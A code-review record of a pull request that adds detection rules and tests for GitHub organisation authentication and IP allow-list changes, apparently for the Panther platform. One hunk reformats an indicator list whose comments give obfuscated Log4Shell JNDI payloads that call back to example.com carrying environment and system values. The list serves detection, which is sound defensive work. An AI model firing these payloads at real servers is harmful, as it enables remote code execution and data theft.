### PR TITLE
New GitHub Org Rules

### PR DESCRIPTION
**Pull request by bseb**
### Background
Creates a couple new Github Org rules.

- Monitors for changes to authentication settings in the Org
- Monitors for changes to IP allow lists ( not a thing at Panther but I would have wanted this rule at my old job)

### Changes
Create two new rules and tests

### Testing
Unit, lint and CI/CD

### CODE REVIEW

**Review by darwayne — DISMISSED** [review]
Haven't ran any tests locally but the code looks sound. 💪🏾

File: github_rules/github_org_auth_modified.py [hunk 1]
```diff
@@ -0,0 +1,19 @@
...
+    ]
+
+    if not event.get("action").startswith("org."):
+        return False
+
+    return event.get("action") in auth_change_events
+
+
+def title(event):
+    return f"GitHub auth configuration was changed by {event.get('actor', '<UNKNOWN USER')}"
```
Comment (nmartin413) [inline github_rules/github_org_auth_modified.py:19]: is this meant to be `<UNKNOWN USER>`?

**Review by nmartin413 — APPROVED** [review]

File: github_rules/github_org_auth_modified.py (hunk 1 above)
Comment (bseb) [reply github_rules/github_org_auth_modified.py:19]: Yes, good catch.

**Review by nmartin413 — APPROVED** [review]

File: github_rules/github_org_auth_modified.py [hunk 2]
```diff
@@ -0,0 +1,19 @@
+def rule(event):
+    auth_change_events = [
+        "org.saml_disabled",
+        "org.saml_enabled",
+        "org.disable_two_factor_requirement",
+        "org.enable_two_factor_requirement",
+        "org.update_saml_provider_settings",
+        "org.enable_oauth_app_restrictions",
+        "org.disable_oauth_app_restrictions",
+    ]
```
Comment (nhakmiller) [inline github_rules/github_org_auth_modified.py:10]: [Optional] Typically we define lists like these outside of the scope of `rule`, so that they're instantiated once per lambda invocation and not once per rule invocation. Technically there should be a small speed increase that way.

I suppose the counterargument is that this way saves some memory for other rules to run, so it really just depends on what we're optimizing for. Since we don't have an official standard I'm ok with this as is, just pointing out is more "standard" to have static lists defined outside the scope of `rule`.

File: github_rules/github_org_auth_modified.py [hunk 3]
```diff
@@ -0,0 +1,19 @@
...
+
+    if not event.get("action").startswith("org."):
+        return False
+
+    return event.get("action") in auth_change_events
+
```
Comment (lindsey-w) [inline github_rules/github_org_auth_modified.py:16]: alternatively: 

```suggestion
    return event.get("action").startswith("org.") and event.get("action") in auth_change_events
```

File: github_rules/github_org_auth_modified.yml [hunk 4]
```diff
@@ -0,0 +1,37 @@
...
+Description: Detects changes to GitHub org authentication changes.
+Runbook: Verify that the GitHub admin performed this activity and validate its use.
+Tests:
+  -
+    Name: GitHub - Authentication Method Changed
+    ExpectedResult: true
+    Log:
+      {
+        "actor": "cat",
+        "action": "org.saml_disabled",
```
Comment (nhakmiller) [inline github_rules/github_org_auth_modified.yml:20]: Can we add a `SummaryAttributes` field that includes at least `action`? Since hypothetically there could be multiple actions performed by the same actor rolled into one alert.

File: github_rules/github_org_ip_allowlist.py [hunk 5]
```diff
@@ -0,0 +1,18 @@
...
+    allowlist_actions = [
+        "ip_allow_list.enable",
+        "ip_allow_list.disable",
+        "ip_allow_list.enable_for_installed_apps",
+        "ip_allow_list.disable_for_installed_apps",
+        "ip_allow_list_entry.create",
+        "ip_allow_list_entry.update",
+        "ip_allow_list_entry.destroy",
+    ]
+    return event.get("action") in allowlist_actions
```
Comment (lindsey-w) [inline github_rules/github_org_ip_allowlist.py:14]: alternatively: 

```suggestion
    allowlist_actions = [
        "ip_allow_list.enable",
        "ip_allow_list.disable",
        "ip_allow_list.enable_for_installed_apps",
        "ip_allow_list.disable_for_installed_apps",
        "ip_allow_list_entry.create",
        "ip_allow_list_entry.update",
        "ip_allow_list_entry.destroy",
    ]
    return event.get("action").startswith("ip_allow_list") and event.get("action") in allowlist_actions
```

**Review by nhakmiller — APPROVED** [review]

File: github_rules/github_org_ip_allowlist.yml [hunk 6]
```diff
@@ -0,0 +1,46 @@
+AnalysisType: rule
+Filename: github_org_ip_allowlist.py
+RuleID: GitHub.Org.IpAllowlist
+DisplayName: GitHub Org IP Allow List modified
+Enabled: true
+LogTypes:
+  - GitHub.Audit
+Tags:
+  - GitHub
+Severity: Low
```
Comment (lindsey-w) [inline github_rules/github_org_ip_allowlist.yml:10]: Wondering if disabling the allowlist or destroying entries would warrant an increased severity?

**Review by lindsey-w — COMMENTED** [review]
LGTM! A couple of minor comments (not required changes)

File: github_rules/github_org_auth_modified.py (hunk 2 above)
Comment (bseb) [reply github_rules/github_org_auth_modified.py:10]: I think once per Lambda makes sense, and I'm down with going with the standard.  My default mode is to not have things defined outside of scopes in which they are used but saving instantiation cycles is logical here

File: github_rules/github_org_ip_allowlist.yml (hunk 6 above)
Comment (bseb) [reply github_rules/github_org_ip_allowlist.yml:10]: Thinking about it I think they probably all deserve at least a medium since this could be used to circumvent controls or lock valid users out of the codebase. I'm going to bump to a medium

File: github_rules/github_org_auth_modified.yml (hunk 4 above)
Comment (bseb) [reply github_rules/github_org_auth_modified.yml:23]: Added

File: global_helpers/panther_iocs.py [hunk 7]
```diff
@@ -781,14 +781,14 @@
...
-    "${date:", # example: ${jndi:ldap://example.com:1234/callback/${date:MM-dd-yyyy}
-    "${::-j", # example: ${${::-j}${::-n}di:${::-l}d${::-a}p://example.com:1234/callback}
+    "${jndi:",  # breadth
+    "${lower:",  # example: ${jn${lower:d}i:l${lower:d}ap://example.${lower:c}om:1234/callback}
+    "${upper:",  # example: ${jnd${upper:i}:ldap://example.com:1234/callback/}
+    "${env:",  # example: ${jndi:ldap://example.com:1234/callback/${env:USER}
+    "${sys:",  # example: ${jndi:ldap://example.com:1234/callback/${sys:java.version}
+    "${java:",  # example: ${jndi:ldap://example.com:1234/callback/${java:os}
+    "${date:",  # example: ${jndi:ldap://example.com:1234/callback/${date:MM-dd-yyyy}
+    "${::-j",  # example: ${${::-j}${::-n}di:${::-l}d${::-a}p://example.com:1234/callback}
```
Comment (bseb) [inline global_helpers/panther_iocs.py:791]: Make fmt cleanup from another PR

File: github_rules/github_org_auth_modified.yml [hunk 8]
```diff
@@ -0,0 +1,40 @@
...
+RuleID: GitHub.Org.AuthChange
+DisplayName: GitHub Org Authentication Method Changed
+Enabled: true
+LogTypes:
+  - GitHub.Audit
+Tags:
+  - GitHub
+Severity: Critical
+SummaryAttributes:
+  - name
```
Comment (nhakmiller) [inline github_rules/github_org_auth_modified.yml:12]: I don't see a `name` field, should this be `actor`?

File: github_rules/github_org_ip_allowlist.yml [hunk 9]
```diff
@@ -0,0 +1,49 @@
...
+RuleID: GitHub.Org.IpAllowlist
+DisplayName: GitHub Org IP Allow List modified
+Enabled: true
+LogTypes:
+  - GitHub.Audit
+Tags:
+  - GitHub
+Severity: Medium
+SummaryAttributes:
+  - name
```
Comment (nhakmiller) [inline github_rules/github_org_ip_allowlist.yml:12]: Same qusetion about `name`

File: github_rules/github_org_auth_modified.yml (hunk 8 above)
Comment (bseb) [reply github_rules/github_org_auth_modified.yml]: This was brain fade. Fixed now.

File: github_rules/github_org_ip_allowlist.yml (hunk 9 above)
Comment (bseb) [reply github_rules/github_org_ip_allowlist.yml]: see above, oops

**Review by nhakmiller — APPROVED** [review]
